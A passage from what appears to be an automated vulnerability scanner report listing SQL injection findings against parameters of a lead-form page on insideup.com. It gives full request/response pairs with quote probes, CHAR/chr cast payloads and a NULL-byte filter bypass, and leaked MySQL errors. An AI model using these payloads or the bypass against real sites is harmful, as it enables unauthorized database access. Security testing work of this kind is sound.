8)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance%00''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:08:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35537


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.252. http://www.insideup.com/ppc/leadflow/dima00/project.php [attributeId_343_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9u5sg3prljhhgnclt8j2fc1b60; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:52:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=34lc4o834qn3fs4oqk8mq6qmg5; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.253. http://www.insideup.com/ppc/leadflow/dima00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR'&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=21e4tvunsri5negc28u72fiqd4; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR''&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:52:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ji0bomvkstq1stneatr8d2svm2; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.254. http://www.insideup.com/ppc/leadflow/dima00/project.php [attributeId_423%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The attributeId_423%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_423%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon'&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ofsd6jsjuch07pbdi0kpb1mec2; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' print, and send&attributeId_425=2765__Yes - We already have a list of addresses' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon''&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:52:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=i8sbpvp9ff1jaqnlh0bo0f7ua7; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.255. http://www.insideup.com/ppc/leadflow/dima00/project.php [attributeId_424 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The attributeId_424 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_424 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send'&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=eesj23r7dkrhfh1aegkrgo1mq2; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'already have a list of addresses&attributeId_426=2768__500 - 4,999&attributeId_4' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send''&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:52:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=dndmtt7fuqrbshtl13mue26qo6; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.256. http://www.insideup.com/ppc/leadflow/dima00/project.php [attributeId_424 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The attributeId_424 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_424 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=-1+OR+17-7%3d10&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send%00'&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rq53j25afphb17omdd4k84qfi5; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:00:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6622
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'already have a list of addresses&attributeId_426=2768__500 - 4,999&attributeId_4' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=-1+OR+17-7%3d10&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send%00''&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rq53j25afphb17omdd4k84qfi5; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:00:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.257. http://www.insideup.com/ppc/leadflow/dima00/project.php [attributeId_425 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The attributeId_425 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_425 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses'&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
